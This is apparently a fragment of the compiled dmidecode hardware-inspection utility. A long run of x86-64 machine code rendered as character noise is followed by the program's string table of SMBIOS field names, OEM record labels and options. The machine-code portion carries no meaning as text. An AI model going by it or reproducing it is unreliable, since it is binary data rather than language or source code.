L��1�H�=�Y  �KJ���SL��1�H�=�Y  �6J���l$ @������1�H�=�Y  L�c1��s]��@�Ź   H�-c�  �������H��H�\A�L$A�4$H��1�A�T$E�D$I���,^��L9�u�鹕��H�-F  H�eC  1�H��H�=V  �I��镕����H��  H�-�E  H�H��H�=�U  H��1��vI���h���H�5�a  H�=@N  1��\I���S��L�cH�k1�H�5�M  H�=�M  L���7I��1�H��H�5nM  H�=�M  �I��I9��V�H�u1�H�=vM  L)���I������H��  H��魶����H��  H�L������H���  H�L�����L�%�&lt;  �SH�=�J  1�L���H��鱶��H���  H������H�5�`  H�=�J  1��}H��L�%�&lt;  逶���Cf�����   f�|$.�+  L��D  1�H�=�D  L��L�D$ �9H���CL�D$ f�����   L�%J  ��1�L�D$ L��H�=�D  �H���SL�D$ f�����   H�=�D  L��1���G���|$q鬣���SH�5aP  H�=cM  1��G���2��L�%�I  ��1�L��H�=D  �G���Cf����  f�|$.L�!D  ��   L��C  L��1�L�D$ H�=�C  �`G���SL�D$ f����Z���L�%?I  H�=�C  L��1��5G���|$q���L��C  1�H��C  L��H�=�C  L�D$ �G���CL�D$ f���tQL�%�H  ��1�L�D$ L��H�=hC  ��F���SL�D$ f���u�H�=lC  H�xC  L��1��F���|$q�{���H�ZC  L��1�L�D$ H�=C  �F���SL�D$ f���t��)�����L��H�=�B  1��bF���Sf�������f�|$.L��B  �w���L��B  �A���@ �CH�U.  ��t��H�|$p�;��H��H��H�=�K  1�� F�����D�CH�5�K  H�=�K  1�D��D��A��f��	f��f�¼������E���A���K�SH�5,@  1�H�=2@  �E���]���S.�Ţ����H�5+D  H�=hB  1��|E���Ӣ���D$ 1�H�=K8  1���X��E1�H�9�  �D$ D��r&#039;I��I��u��P���H�=A  1��Y�����D  J�4�H��1��zY��H���  ���S*�ۡ���S,����H�5�.  H�=9�  1���D���0���H�5-  H��H�=H  1���D���Y����     ��H�5WC  H�=�G  1��D��鑹��H�5�\  H�=^;  1��D�����H�\$H�S�C���T$q��9��`���H�H��,  ���t��H�|$p�9��H��H��H�=?  1��7D���)���f�L��$�   L�C  1�L��L���D�����H���  H��齳���H�H�K=  ��~�N���&lt;�H�F=  H�3,  HE��5�����H�5jB  H�={?  1��C��麛����H�5`?  H�=R?  1��C���~���L�l$ 醏��H�5GK  H�=XK  1��zC���Y���d   ��1�H�5�C  H�=�C  f������1��NC���C������H��������QHc���������H�t$ 1�H�=mC  �C���C�y��� H�5��  H��1��WW���9���H�5s�  H��1��AW������H�55�  H��1��+W�����H�5�  H��1��W�������H�5�@  H�=\:  1��B����L��$�   H�=[A  1�L���zB���r�H�5�D  H�=�D  1��`B���y���L��&gt;  H�=�D  1�L���CB���\�����H���  H�H���̽��L�cH�k1�H�5[F  H�=^F  L���	B��1�H��H�5@F  H�=TF  ��A��I9���H�u1�H�=HF  L)���B�����H�5�Y  H�=�F  1��A��髍��H�5�Y  H�=H  1��A��鑍��H�5�Y  H�=�G  1��A���[��H�5�Y  H�=�G  1��kA�����H�5�Y  H�=�G  1��QA������L�l$ �9���L�l$ �/���1�H�=P  �ZJ���|$q�����CH��,  H��,  HD�H�-Y=  H�=�O  1�H����@�����H�5M�  H��1��;U����H�5�X  H�=9;  1��@��锲���S��%�����  ��   �� � t\��
H�5rC  H�=�:  ��1��@���W����SH�5�J  H�=�J  1������a@���
��H�5�X  H�=C7  1��G@��遲����H�5C  H�=�:  ��1��(@�������H�5�B  H�=�:  1��@���߱��-�   H�{�  H�H������-�   H��  H�H���ȣ��H�-)&lt;  1�H�9  H��H�=L  �?���|$  ��  �L$8HcD$0D�D$q��H؉L$0D9��\  ����y���L�`��L�|$8�D$X�D$     L�l$@L�t$H�N���H��&#039;  H�9  HE�H�5lL  H�=oL  1��4?��A�D$�D$ M�d�D$ ;D$X��  D�D$qA�D$�L$0�D$dA�ǍD�D$0D9��w  H��*  A�$H��$�   H��$�   H��K  ��H��$�   H�k8  H��$�   H��K  H��$   ���&lt;���Hc�H�5�K  H�=�K  H����   1��z&gt;��A��Z�&lt;������3���I�T$�  H�5�K  H�=�F��H�vV  �#4��H��K  E�l$H��&amp;  H��$�   H�tK  H��$�   H�jK  H��$�   H�dK  H��$�   H��$   A��wA��H����   H��H�=FK  1��F��E�|$H�JK  H��$�   H��$�   H�8K  L��%  H��$�   A��wIc�L����   1�L��H��L�D$hH�=	K  �E��D��L�D$h��&lt;�X  H��J  E�t$4H��$�   H��%  H��$�   H��J  H��$�   H�~J  H��$�   H�xJ  H��$�   A��wA��H��İ   H��H�=ҍ  1��+E��H�lJ  E�|$5H��$�   H��$�   H�TJ  L�-%  H��$�   A��wIc�L��İ   1�L��H�=��  H����D��D���&lt;��   A�T$\I�L$]�BZ;D$d|�   H��$  H�5wJ  H�=uJ  1��D�������Cf���tTf���t4L�%-&gt;  ��1�L��H�=�&gt;  � &lt;�����L�|$8L�l$@L�t$H���H�5�&gt;  H�=n&gt;  1���;���Ǭ��L�T8  H�=T&gt;  1�L����;��骬��M��&amp;   �   1�H��$�   H�nI  H��L��$�   �b)��I�|$6D��L���B8��H��H��H��1���C��M��H�ߺ&amp;   H�GI  �   1��$)��I�|$FD��L���8��H��H��H��1��C��E�|$X1�A�T$VH�5R%  H�=I  �dC��D��H�5�9  1�H�=I  �LC�����L��$�   H��H  �&amp;   1�L��L��$�   �   �(��I�|$D��L���|7��H��L��H��1��B��L�D$hL��1�H�_H  �&amp;   �   �\(��I�|$$D��L���&lt;7��H��L��H��1��B������L�|$8L�l$@H��  �   L�t$HH�=� P�D$(��P�L$@1�D��$�   �&#039;��ZY�(���D�L$rH�=� H�U�  1��   �&#039;������H��P  �K�|$ H��$�   H�^F  A��H��$�   H�TF  H��$�   H�LF  H��$�   �A�&lt;�&#039;  ��H�&quot;  H��L$ H�_3  H�=�#  HI�1��9���L$ ������E�������K�S1�H�5aF  D�K
D�C	H�=�/  �R9�����D  H�s1�H�=�;  �&amp;:������|$q����   �   �   H��D�L$ �  D�L$ H��H���J  H�5�H  D�L$ �%�����&quot;  1�H�=�H  H�-&#039;5  �A���S1�H�5_7  H�=Q1  �8���{ H�F$  H�x/  HI�H��H�=RL  1��8���}����|$q�6��{LENO�)�f�{VO���{
���{�	��{���H�=e�  1��fA��H�t$x�|$q�   �   �  H��H���|  H�-a4  H�=H  1�H���7��H�t$x�|$q�   �   �`  H��H���3  H��H�=2  1���7��鵃���T$pD�L$ �����T$p����D  L�l$ 鍃���Q#����H��H�=�!  �L$@��H�H����   1��l7���L$@���2  E���)  �SL�%p!  1�H�=�C  L���97���S	L��1�H�=�C  �$7���p����|$q	����{T����{P����{����{����{���1�H�=ي  H�-)3  �?���C	H�a&quot;  H�k&amp;  HD�H��H�=�F  1��6��阂��H��  ���H��  �x���f�     ��1�1�H�=[C  L�%{�  ��I���   L�t$ M��I���H���H��H��
��   ��s�I�4�L��1��J���݀�ut�|$ vmL�%?   �S1�H�=�B  L���6���S	L��1�H�=�B  ��5���SL��1�H�=B  ��5���SL��1�H�=vB  ��5������M��L�t$ 骁������   �|$ ��   �SL�%�  1�H�=B  L���5���S
1�L��H�=	B  �n5���CD�KH�5B  D�C�KH�=$B  �SP�CP1��=5��AXAY�|$ ����1�1�H�=B  �~H���C�t  H�5��  H��1��cI���C�J����SL��H�=�  1���4���0������L����|$ �A���L�%�  �S1�H�=ZA  L���4���S
1�L��H�=NA  �4���S1�L��H�=*A  �4���S1�L��H�=!A  �p4���CD�KH�5A  �K�SH�=&#039;A  D�CP�CP1��?4���KD�KD�[^��_D!�D��uf��t&#039;E��D��A��1�A��H�5�)  H�=�3  A���3���|$ �&lt;�1�1�H�=�@  �;G���CtHH�5��  H��1��$H���C���SL��H�=ă  1��3�����H�=}  1���G�����H�=j  1���G���ff.�     f�AUATU��SH��X�OdH�%(   H�D$H1�H9���   E1Ҁ�w&#039;H�D$HdH+%(   ��  H��XD��[]A\A]�D  H��I��H��tH��H�1�D  H��H9�u�E1҄�u��s�S�K	A����A����A�A���  �  �CH�{��H�t$A��D��1҉D$�#D��I��H��t(�t$�X�  u^D��A��1�H����{��L�����A�   �)����     ��A�   �   1�H�=�  H�&quot;�  ���E1����D  �o�oK��H�|$ )L$0�T$1�D$0)D$ D�D$&amp;D$%�D�L��D$2D$3D��D$4D$5D$6D$7H�D$0    �D$%�&gt;  �N���f�     H�=�A  1�L�D$��:��L�D$����^��ff.�      AWAVAUATA��USH��H�OdH�%(   H�D$81�H9���  E1���w*H�D$8dH+%(   �Z  H��HD��[]A\A]A^A_�@ H��H��H��tH��H�1�D  H��H9�u�E1���u�E1��{_DMIH�Cu��x_u�H�K1�f.�     H��H9�u����s����C�S��Ћ��  ��  D��E��A����u��f��H�=�@  ��1��9��D�{�CI��E��{H�t$D��D���D$��A��H��H���  �t$��  ��   �o�oK��H�|$)L$ �T$)�D$()D$D�D$D$%�D�H��D$*D$+D�ƈD$%�D$(    �e  H�����A�   ���f�A�   �ɾ   1�H�=i�  H���  �=��E1��[���E��D��D��H���$y��뭉у�f=!tf=3t\f=����A�  A�  �����H�=�  �Ⱦ   1�H�s�  A�   ������  �  ���A�   ����A�  A�  �������H�=��  H�+�  A�   1��3   �   �|�����  �  �F�������    AVI��H�OAUATU��1�SH��H��@dH�%(   H�D$8H��D  H��H9�u�1�����   �sA����A������fA�� A	�&gt;�  ��   D�sE���CA��{D��H�t$��D��D$��?��I��H��t&amp;�t$���  uAA��D��D��H���w��L���H���   H�T$8dH+%(   ��   H��@[]A\A]A^�f�H�H�SH�|$ H�D$ H��(�΍D�H�T$(�H��H���D$(    H��ȉ�   �L��D$%�	  �~���fD  @����H�=�=  1�@��L�D$�6��L�D$� ����+��f.�     �H����   AVE1�AUI��ATA��UH��SH���fD  I�H����I9�t:��tFH��J�t5 D��L)��c��H���u��x���8uS�   I9�u�f�     1�[]A\A]A^�D  I9�t�H�=t�  L��   H�I�  �@���������f�     L������[�����]A\A]A^�1���    ��AVI��H��AUI��ATUSH��1�H��   dH�%(   H��$�   1��w�������   H��ǉ���������   H�D$0L9���   H�;L)�H9�vH�H������I��H����   1�L�������L��H�����   H�L��������tL��E1������������tFH��$�   dH+%(   ��   H�Ġ   L��[]A\A]A^��    H�;�u������E1�8t�L������f�     H�=	�  L��1�E1�H���  �   �����v��� H�=�  H�}  �   1����H�=Η  �b���=�������H�=��  �L���2����    ��AWI��1�AVI��H��AUI��ATUSH��   dH�%(   H��$�   1���������d  H�t$�ǉ��&gt;�����uaH�=B�  L��1�E1�H�G�  �   �	�����������  H��$�   dH+%(   ��  H�ĸ   L��[]A\A]A^A_�D  �c�����  �D$(% �  =    u�L������I��H����  �   �]��M��1��   I��L��H�I��A��N�:I)�H�T$�   L��L�$���L�$L�T$H���H����   J�4L��L��L�$�_��H�4$H������������H�=3�  L��   1�H��  ���H�=#�  ������@ L�������� H�=��  L��1�E1�H���  �   ������ L������I��H����   �D$(% �  = �  ��K�7H;D$@���H�=��  L��   1�H�)�  �\��L��E1�����C���@ 1�L�������H���tL��L��L����F�����u�����D  H�=1�  L��   1�H��  ���H�=�  �����(��H�=�  E1��������@ ��H���   H�t$(H�T$0H�L$8L�D$@L�L$H��t7)D$P)L$`)T$p)�$�   )�$�   )�$�   )�$�   )�$�   dH�%(   H�D$1��	   ����   �   H��$�   H��  H�D$H�=�!  H�D$ �$   �D$0   H�D$����
   ����H�D$dH+%(   uH���   ��-��ff.�     f�������  H���  ��Hc�H�&gt;��H�5�  1��0&#039;��D�
H�5��  1�E��D��D��A��fA��f��f����A�����&amp;��f.�     D�
H�5��  1�E��D��D��A��fA��f��f����A�����&amp;��f.�     ����  H��A��A����A����A��P����A��  ��A��H�5Q�  1��j&amp;��H���D  D�R�J1�H�5~�  D�JD�H�=U  A����D���0&amp;��D�
D��E��D��D���A��A�������A�����   ���Ƀ��A	�H�5��  1���%���     ���A������A��������u����������   	эPH�5%�  1��%��fD  ��    ��@����   ��AV��AU@�ATA��US��   @��1�H�=E2  1��8���   L�5��  L�-�!  �
H��H��t��s�I�4�L��1�H���9��H��u�A��1�L�-�  L�%\!  � H��H��t��s�I�t� L��1�H���&gt;9��H��u�[]A\A]A^��    H�5�&lt;  H�=�1  1��$�� [H�5�  ]1�A\H�=�1  A]A^�$�� ��AV1�I�ֺ�  AUI��H�=T�  ATA��US��   �������  ��H�59�  �:��H��H����  ���  tu��H��   L�����H����   1Ҿ    H����������   ���  tYD��H��   L���V��H��u`H���x������   []A\A]A^��    H���  ��H�=��  1��94���o���@ H�y�  D��H�=��  1��4���fD  H�=�  H�R�  H��  1��   ����H�=d�  ���[H��]A\A]A^����H�=��  H��  H�q  1��   ���H�=
�  []A\A]A^�N��H���  H�=��  H�&lt;  1��   �m��H�=��  �!���H�=x�  H���  H�  1��   �&gt;��H�=Џ  �H�=N�  H���  H��  1��   ���H�=z�  �m����     ��@��ATL�$&gt;U��S�Ӏ�w�5D  L������M�d��tA�&lt;$ u�E1�L��[]A\�f�     A�$��t��t�L������H��t�L��L��	fD  ��� ��^v�.H��H9�u�L��[]A\�f�     ���N���u
@��)��  �   f���S  f��� wsf��� �   f����   f��
��  f���Z  �V�   ��f�� f�� �  �с��   ��@t	��o��   ��f�������f�     f��w9f��wf����   f��� ��   �   @��&#039;��   1��F&#039;�����f��bwf��X��Ѓ��@ f��lf������f�     f��O��   f����   ���   �   H��H��   ��� H��u6��  � H������fD  f�� �   �   H��H����p�H��tw�fD  f��� vf��� f������f.�     1�f��� �����f�1��D  f��kvf�� f������ f��f��Ѓ��@ �N(�.����    ��  ` H�����Ð�   �f.�     ����L9�w��
��P���  ��H��H���                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             &lt;BAD INDEX&gt; Not Specified Not Settable Pentium Pro &lt;OUT OF SPEC&gt; Core 2 Core 2 or K7 Intel AMD Gen12 Gen11 Gen10 Plus Gen10 Gen9 Gen8 G7 ProLiant Apollo Synergy Edgeline bios Valid type keywords are:
   %s
 bios-vendor Valid string keywords are:
 No OEM string number %u
 %u.%u
 %u MHz
 %lu %s %.1f V  (Double-bank Connection)  (Single-bank Connection) Not Determinable%s Disabled%s Not Installed %u MiB%s %g V %lu MT/s %u MT/s Bank %d, Hex 0x%02X None %s Revision Number %s Device Type %s Device Revision %hu.%hu 0x%04x NIC %hhu %hu Gbit/s 		%s:  Invalid string keyword: %s
 count calloc Invalid type keyword: %s
 Invalid type number: %lu
 Invalid handle number: %s
 String keyword expected
 d:hqs:t:uH:V dev-mem help quiet no-quirks dump-bin from-dump oem-string no-sysfs list-strings list-types #  Table at 0x%08llX. Failed to read table, sorry.
 	%s: 		 Header and Data  %02X HP HPE Yes No Reserved Empty Vendor Specific CBI w/ completion interrupt CBI w/o completion interrupt Obsolete Bulk-Only UAS Hi-Speed w/ single TT Hi-Speed w/ multiple TT ZB OK Warning Critical Not Encrypted Not Supported Byte Accessible Block I/O Primary Secondary Tertiary Quaternary Front B. %s ProLiant Other ROM Info Redundant ROM Version OEM ROM Binary Filename OEM ROM Binary Build Date Serial Port A Serial Port B Parallel Port Floppy Disk Port Virtual Serial Port Associated Handle BSP x2APIC Advanced Thermal Margining Physical Slot Physical Socket %d W Maximum Power 0x%08x x2APIC ID 0x%08x%08x %d MT/s Interconnect Speed QDF/S-SPEC CPU ID %04x-%02x-%02x 0x%X Patch %s DIMM Location Record Associated Memory Record Board Number Processor Number Logical DIMM Number UEFI Device Path UEFI Device Name Memory Controller Number Memory Channel Number IE DIMM Number IE PLDM ID Controller Manufacturer ID Controller Product ID Best Interleave DIMM Index %s Device Correlation Record N/A Associated Device Record Associated SMBus Record Device Not Present PCI Device Info PCI Vendor ID PCI Device ID PCI Sub Vendor ID PCI Sub Device ID PCI Class Code PCI Sub Class Code Parent Handle Peer Bifurcated Device Upstream Device Device Location Device Instance Device Sub-Instance Do Not Display Enclosure Structured Name UEFI Location Associated Real/Phys Handle PCI Part Number Segment Group Number Rack Name Enclosure Name Enclosure Model Enclosure Serial Enclosure Bays Server Bay Bays Filled %s %s %s 64-bit CRU Information 0x%016llx Physical Address %s Version Indicator Firmware Type Firmware Name String Firmware Version String No Version Data 0x%02X B.0x%02X %d.%d.%d.%d v%d.%.2d (%.2d/%.2d/%d) %d.%d.%d Build %d %d.%d %d %d.%d.%d.%d (%.2d/%.2d/%d) %c%c%c%c.%d%d %d.%02d 0x%02x.0x%02x.0x%02x Unique ID %s ProLiant Information Power Features Omega Features Misc. Features iCRU UEFI Option ROM Measuring Hidden Disable Reason Error Condition Standard Algorithm Supported Chinese Algorithm Supported Trusted Module Attributes FIPS Certification Chip Identifier %s Power Supply Information Access Method I2C Segment Number I2C Bus Number %s DIMM Attributes Record 0x%08X HPE Smart Memory Load Reduced DIMM installed HPE Standard Memory Installed %d mV Minimum Voltage Configured Voltage 0x%0X Map-Out Reason Configuration Error Training Error Encryption Status 0x%X raw(0x%X) FRU I2C Address Box Number NVRAM ID SAS Expander WWID Total SAS Bays A0 Bay Count A2 Bay Count Backplane Name %s DIMM Vendor Information DIMM Manufacturer DIMM Manufacturer Part Number DIMM Vendor Serial Number 20%02x-W%02x DIMM Manufacture Date %04x:%02x:%02x.%x Management Port Parent Hub Port Instance Port Speed Capability USB Vendor ID Embedded SD Card Mass Storage USB Class USB SubClass USB Protocol HUB USB Product ID %u MB USB Capacity %s ProLiant Inventory Record Package Version Image Size Not Available Attributes Defined/Set %s: %s Lowest Supported Version Hard Drive Type %llx %.1f %s %ld hours Poweron %hhu W Power Wattage Form Factor Health Status Model Number %u bytes Block Size %hhu RPM Rotational Speed Negotiated Speed Capable Speed %s DIMM Current Configuration Region ID Persistence Type Passphrase Enabled Interleave Set Index Interleave DIMM Count Interleave Set Health PCIe Riser Board Type Riser Position Riser ID %s0x%02X CPLD Version Riser Name PCIe Riser (MHS Platform) %x.%x Firmware Version Downgradable Slot Count Slot IDs 0x%x 0x%08x (%c%c%c%c) Signature %u KiB Not Socketed Other CXL FLexbus 1.0 Abbreviated OEM-specific End of log Invalid Product-specific Memory-mapped Active High Active Low Edge MCTP Network OEM Acer Dell Computer Corporation Dell Inc. Hewlett-Packard Hewlett Packard Enterprise IBM LENOVO &lt;TRUNCATED&gt; Platform Firmware Information Release Date 0x%04X0 Runtime Size ROM Size %u %s %u.%u Platform Firmware Revision System Information Product Name Wake-up Type SKU Number Family Base Board Information Asset Tag Location In Chassis Chassis Handle Contained Object Handles Chassis Information Lock Boot-up State Power Supply State Thermal State Security Status OEM Information Unspecified Height %u U Number Of Power Cords Contained Elements %s (%u) %s (%u-%u) Processor Information Socket Designation %u MHz External Clock Max Speed Current Speed Populated, %s Unpopulated Upgrade Not Provided L1 Cache Handle L2 Cache Handle L1 No %s Cache L3 Cache Handle L2 L3 Core Count Core Enabled Thread Count Thread Enabled Memory Controller Information Error Detecting Method Error Correcting Capabilities Supported Interleave Current Interleave %u MiB Maximum Memory Module Size Maximum Total Memory Size 70 ns 60 ns 50 ns Supported Speeds Supported Memory Types Memory Module Voltage Associated Memory Slots Memory Module Information Bank Connections %u %u %u ns Installed Size Enabled Size See Event Log Error Status Cache Information %s, %s, Level %u Operational Mode Maximum Size Supported SRAM Types Installed SRAM Type Error Correction Type System Type Associativity Port Connector Information Internal Reference Designator Internal Connector Type External Reference Designator External Connector Type Port Type System Slot Information Data Bus Width Current Usage Adapter %u, Socket %u Bus Address Data Bus Width (Base) Peer Devices Peer Device %hhu %04x:%02x:%02x.%x (Width %u) PCI Express Generation Slot Physical Width %u.%02u mm Pitch On Board Device Information Description OEM Strings String %hhu System Configuration Options Option %hhu Firmware Language Information Language Description Format Installable Languages Currently Installed Language Group Associations Items 0x%04X (%s) System Event Log Area Length Header Start Offset %u byte%s Header Length Data Start Offset Index 0x%04X, Data 0x%04X Access Address %s, %s Change Token Header Format Descriptor %d Data Format %d Physical Memory Array Maximum Capacity Error Information Handle No Error Number Of Devices Memory Device Total Width %u bits Data Width %lu MiB %lu GiB %lu TiB No Module Installed Bank Locator Type Detail Rank Configured Memory Speed Maximum Voltage Memory Technology Module Manufacturer ID Module Product ID Non-Volatile Size Cache Size Logical Size PMIC0 Manufacturer ID PMIC0 RCD Manufacturer ID RCD Granularity Operation Vendor Syndrome Memory Array Address Resolution Memory Array Mapped Address 0x%016llX Starting Address Ending Address Range Size 0x%08X%03X Physical Array Handle Partition Width Memory Device Mapped Address Physical Device Handle Partition Row Position Interleave Position Interleaved Data Depth Built-in Pointing Device Buttons Portable Battery Design Capacity %u mWh Design Voltage %u mV SBDS Version Maximum Error %u%% SBDS Serial Number %u-%02u-%02u SBDS Manufacture Date SBDS Chemistry OEM-specific Information System Reset Watchdog Timer Boot Option Boot Option On Limit Reset Count Reset Limit Timer Interval %u min Timeout Hardware Security Power-On Password Status Keyboard Password Status Administrator Password Status Front Panel Reset Status System Power Controls -%02X :%02X Next Scheduled Power-on Voltage Probe Maximum Value %.3f V Minimum Value %.1f mV Tolerance Accuracy %.2f%% Nominal Value Cooling Device Temperature Probe Handle Cooling Unit Group Unknown Or Non-rotating Nominal Speed %u rpm Temperature Probe %.1f deg C %.3f deg C Electrical Current Probe %.3f A %.1f mA Out-of-band Remote Access Manufacturer Name Inbound Connection Outbound Connection %04X:%04X 16-bit Entry Point Address 32-bit Entry Point Address System Boot Information Management Device Address Type Management Device Component Management Device Handle Component Handle Threshold Handle Lower Non-critical Threshold Upper Non-critical Threshold Lower Critical Threshold Upper Critical Threshold Memory Channel Maximal Load Device %hhu Load Device %hhu Handle IPMI Device Information Specification Version I2C Slave Address NV Storage Device Address NV Storage Device 0x%02X (SMBus) Base Address 0x%016llX (%s) Register Spacing Interrupt Polarity Interrupt Trigger Mode Interrupt Number System Power Supply Power Unit Group Model Part Number Max Power Capacity %u W Present, %s Input Voltage Range Switching Plugged Hot Replaceable Input Voltage Probe Handle Cooling Device Handle Input Current Probe Handle Additional Information %d Referenced Handle Referenced Offset Unexpected size Onboard Device Reference Designation Type Instance 0x%02X%02X%02X%02X Host Interface Type PCI/PCIe USB v2 PCI/PCIe v2 idVendor idProduct SubVendorID SubDeviceID %02x:%02x:%02x:%02x:%02x:%02x MAC Address Device Characteristics 0x%02x:0x%02x:0x%02x:0x%02x IPMI Redfish over IP %02x (%s) Protocol ID Service UUID Static DHCP AutoConf Host Selected Host IP Assignment Type IPv4 IPv6 Host IP Address Format %s Address %s Mask %s Redfish Service Address %s Redfish Service Mask Redfish Service Port Redfish Service Vlan %.*s Redfish Service Hostname TPM Device Firmware Component Name Firmware ID Updatable Write-Protect Associated Components End Of Table Acer Hotkey Function 0x%04hx WiFi 3G WiMAX Bluetooth Dell BIOS Flags ACPI WMI Supported Dell Hotkeys Hotkey Mappings Dell Indexed I/O Access Index Port Data Port 0x%02hhx Checked Range Start Index Checked Range End Index Check Value Index Tokens Dell Token Interface Command I/O Address Command I/O Code TVT-Enablement ThinkVantage Technologies Fingerprint Reader Version ID %s Type SMBIOS %u.%u.%u present. _DMI_ SMBIOS %u.%u present. Legacy DMI %u.%u present. /sys/firmware/efi/systab /proc/efi/systab /dev/mem 3.6 dmidecode %s _SM3_ /sys/firmware/dmi/tables/DMI SMBIOS3 SMBIOS %s entry point at 0x%08llx Scanning %s for entry point. Flexible LOM Embedded LOM NIC in a Slot Storage Controller USB Hard Disk Other PCI Device RAM Disk Firmware Volume UEFI Shell Generic UEFI USB Boot Entry File NVME Hard Drive NVDIMM Embedded GPU Embedded iLO Virtual Media Front USB Port Rear USB Port Internal USB Internal SD Card Embedded SATA Port Embedded Smart Array PCI Slot RAM Memory URL NVMe Drive Bay NVDIMM Processor NVDIMM Board NVMe Riser NVDIMM Name Space VROC SATA VROC NVMe Redundant System ROM System ROM Bootblock SL Chassis Firmware Hardware PAL/CPLD SPS Firmware (ME Firmware) SL Chassis PAL/CPLD APML NVMe Backplane Firmware Intelligent Provisioning SPI Descriptor Version UMB Backplane Firmware Embedded Diagnostics EL Chassis Firmware Revision EL Chassis PAL/CPLD Embedded Video Controller Intel NVMe VROC Intel SATA VROC Intel SPS Firmware CPU Mezzanine Board CPLD Intel CFR information OCP cards DC-SCM CPLD Power Distribution Board CPLD PCIe Switch Board CPLD Sideband Board CPLD PCIe Riser MCU Firmware PCIe Switch Board Firmware Power Supply Firmware BMC Firmware Present/Enabled Present/Disabled Self-Test User Disabled TPM 1.2 TPM 2.0 Intel PTT fTPM Not FIPS Certified Pluggable and Optional Pluggable but Standard Soldered Down on System Board STMicroGen10 TPM Intel firmware TPM (PTT) Nationz TPM STMicroGen10 Plus TPM STMicroGen11 TPM STMicroGen12 TPM IPMI I2C iLO Chassis Manager Internal Front of Server Rear of Server Embedded internal SD Card iLO USB USB Hub for NAND Controller Debug Port OCP USB Not Shared Shared with physical switch Shared with automatic control USB 1.1 Full Speed USB 2.0 High Speed USB 3.0 Super Speed SCSI command set not reported RBC ATAPI UFI LSD FS IEEE 1667 Reset Required Authentication Required In Use UEFI Image Undetermined NVMe SSD SAS SATA SSD NVMe Manged by VROC/VMD kB GB TB PB EB EDSFF Unknown EDSFF 1U Short EDSFF 1U Long EDSFF E3 Short EDSFF E3 Long 3.5&quot; form factor 2.5&quot; form factor Less than 1.8&quot; form factor mSATA M.2 MicroSSD CFast Healthy DIMM Missing Config Inactive SPA Missing New Goal Locked bios-version bios-release-date bios-revision firmware-revision system-manufacturer system-product-name system-version system-serial-number system-uuid system-sku-number system-family baseboard-manufacturer baseboard-product-name baseboard-version baseboard-serial-number baseboard-asset-tag chassis-manufacturer chassis-type chassis-version chassis-serial-number chassis-asset-tag processor-family processor-manufacturer processor-version processor-frequency baseboard chassis processor cache connector slot MCA is supported EISA is supported PCI is supported PC Card (PCMCIA) is supported PNP is supported APM is supported Firmware is upgradeable Firmware shadowing is allowed VLB is supported ESCD support is available Boot from CD is supported Selectable boot is supported Firmware ROM is socketed EDD is supported NEC PC-98 ACPI is supported USB legacy is supported AGP is supported I2O boot is supported LS-120 boot is supported IEEE 1394 boot is supported Smart battery is supported UEFI is supported System is a virtual machine Manufacturing mode is enabled Board is a hosting board Board is removable Board is replaceable Board is hot swappable VME (Virtual mode extension) DE (Debugging extension) PSE (Page size extension) TSC (Time stamp counter) MCE (Machine check exception) SEP (Fast system call) PGE (Page global enable) PAT (Page attribute table) DS (Debug store) ACPI (ACPI supported) SS (Self-snoop) HTT (Multi-threading) PBE (Pending break enabled) 64-bit capable Multi-Core Hardware Thread Execute Protection Enhanced Virtualization Power/Performance Control 128-bit Capable Arm64 SoC ID FPM SIMM Burst EDO SDRAM Uncorrectable Errors Correctable Errors Non-burst Pipeline Burst Synchronous Asynchronous PC-98 Hireso PC-H98 PC-98 Note PC-98 Full Mini Centronics Proprietary DB-25 male DB-25 female DB-15 male DB-15 female DB-9 male DB-9 female RJ-11 RJ-45 50 Pin MiniSCSI Mini DIN Infrared HP-HIL Access Bus (USB) SSA SCSI Circular DIN-8 male Circular DIN-8 female On Board IDE On Board Floppy 50 Pin Dual Inline 68 Pin Dual Inline Mini Centronics Type-14 Mini Centronics Type-26 Mini Jack (headphones) BNC IEEE 1394 SAS/SATA Plug Receptacle USB Type-C Receptacle 8251 Compatible 8251 FIFO Compatible Parallel Port PS/2 Parallel Port ECP Parallel Port EPP Parallel Port ECP/EPP Serial Port XT/AT Compatible Serial Port 16450 Compatible Serial Port 16550 Compatible Serial Port 16550A Compatible SCSI Port MIDI Port Joystick Port Keyboard Port Mouse Port Firewire (IEEE P1394) PCMCIA Type I PCMCIA Type II PCMCIA Type III Cardbus Access Bus Port SCSI II SCSI Wide Video Port Audio Port Modem Port Network Port Thunderbolt PC-98/C20 PC-98/C24 PC-98/E PC-98/Local Bus PC-98/Card PCI Express PCI Express x1 PCI Express x2 PCI Express x4 PCI Express x8 PCI Express x16 PCI Express 2 PCI Express 2 x1 PCI Express 2 x2 PCI Express 2 x4 PCI Express 2 x8 PCI Express 2 x16 PCI Express 3 PCI Express 3 x1 PCI Express 3 x2 PCI Express 3 x4 PCI Express 3 x8 PCI Express 3 x16 PCI Express 4 PCI Express 4 x1 PCI Express 4 x2 PCI Express 4 x4 PCI Express 4 x8 PCI Express 4 x16 PCI Express 5 PCI Express 5 x1 PCI Express 5 x2 PCI Express 5 x4 PCI Express 5 x8 PCI Express 5 x16 PCI Express 6+ EDSFF E1 EDSFF E3 MCA EISA PC Card (PCMCIA) VLB Processor Card Proprietary Memory Card I/O Riser Card NuBus PCI-66 AGP AGP 2x AGP 4x PCI-X AGP 8x M.2 Socket 1-DP M.2 Socket 1-SD M.2 Socket 2 M.2 Socket 3 MXM Type I MXM Type II MXM Type III MXM Type III-HE MXM Type IV MXM 3.0 Type A MXM 3.0 Type B PCI Express 2 SFF-8639 (U.2) PCI Express 3 SFF-8639 (U.2) PCI Express Mini 76-pin PCI Express 4 SFF-8639 (U.2) PCI Express 5 SFF-8639 (U.2) OCP NIC Prior to 3.0 Platform Firmware Base Board Memory Controller Port Connector System Slots On Board Devices Firmware Language 32-bit Memory Error Boot Integrity Services System Boot 64-bit Memory Error IPMI Device Additional Information String Property Valid Not Full Single-bit ECC memory error Multi-bit ECC memory error Parity memory error Bus timeout I/O channel block Software NMI POST memory resize POST error PCI parity error PCI system error CPU failure EISA failsafe timer timeout Logging disabled System limit exceeded Hard disk information System reconfigured Log area reset/cleared System boot Multiple-event Multiple-event handle POST results bitmap System management PC-98/C20 Add-on Card PC-98/C24 Add-on Card PC-98/E Add-on Card PC-98/Local Bus Add-on Card CXL Add-on Card System Board Or Motherboard EISA Add-on Card PCI Add-on Card MCA Add-on Card PCMCIA Add-on Card Proprietary 